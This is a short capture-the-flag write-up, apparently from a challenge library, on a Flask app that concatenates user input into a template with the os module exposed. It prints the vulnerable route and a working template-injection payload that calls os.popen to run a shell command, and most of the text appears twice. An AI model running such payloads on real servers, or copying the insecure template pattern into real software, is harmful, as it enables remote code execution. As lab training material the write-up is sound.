mr-template-man
SRC: https://library.m0unt41n.ch/challenges/mr-template-man
XSS Injection and RCE via insecure template functionality. OS is wrapped and provided within our templating, which combined with the content XSS results into fully abuseable RCE.
With {{ }} we can actually inject template functionality and then abuse the os wrapper.
Final payload: {{ os.popen("cat flag.txt").read() }}
SRC: https://library.m0unt41n.ch/challenges/mr-template-man
XSS Injection and RCE via insecure template functionality. OS is wrapped and provided within our templating, which combined with the content XSS results into fully abuseable RCE.
Python:
@app.route("/", methods=["GET"])
def index():
content = request.args.get("content") or ""
ctx = {
"os": os
}
try:
return render_template_string("""
<p>""" + content + """</p>
<span>Server running as pid {{ os.getpid() }}</span>
""", **ctx)
except Exception as e:
return render_template_string("""<!DOCTYPE html><html></html>""", ex=str(e))With {{ }} we can actually inject template functionality and then abuse the os wrapper.
Final payload: {{ os.popen("cat flag.txt").read() }}
